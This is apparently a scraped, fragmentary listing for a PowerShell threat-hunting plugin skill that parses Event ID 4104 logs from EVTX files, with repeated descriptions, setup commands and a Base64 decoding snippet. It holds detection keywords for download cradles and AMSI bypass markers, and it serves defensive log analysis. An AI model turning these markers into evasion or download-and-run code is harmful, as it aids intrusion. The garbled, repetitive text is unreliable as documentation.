Parses PowerShell script block logs (Event ID 4104) from EVTX files to detect obfuscated commands, Base64 payloads, download cradles, AMSI bypasses via python-evtx, entropy analysis, and pattern matching.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
1. 安装依赖: `pip install python-evtx lxml`
Parses Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files using python-evtx to reconstruct scripts and detect obfuscated commands, Base64 payloads, download cradles, Invoke-Expression abuse, and AMSI bypasses for threat hunting.
Parses PowerShell Script Block Logs from EVTX files to detect obfuscated commands, encoded payloads, download cradles, and AMSI bypasses using python-evtx and entropy analysis.
Hunts malicious PowerShell activity in Windows EVTX logs (events 4104/4103) by parsing script blocks, detecting obfuscation, AMSI bypasses, encoded payloads, credential dumps, and download cradles.
Share bugs, ideas, or general feedback.
pip install python-evtx lxmlMicrosoft-Windows-PowerShell%4Operational.evtx-EncodedCommand、FromBase64String)DownloadString、DownloadFile、Invoke-WebRequest、Net.WebClient)AmsiUtils、amsiInitFailed)python scripts/agent.py --evtx-file /path/to/PowerShell-Operational.evtx --output ps_analysis.json
import base64
if "-encodedcommand" in script_text.lower():
encoded = script_text.split()[-1]
decoded = base64.b64decode(encoded).decode("utf-16-le")
拆分在多个 4104 事件中的脚本共享一个 ScriptBlockId。按 MessageNumber 顺序拼接各块以恢复完整脚本。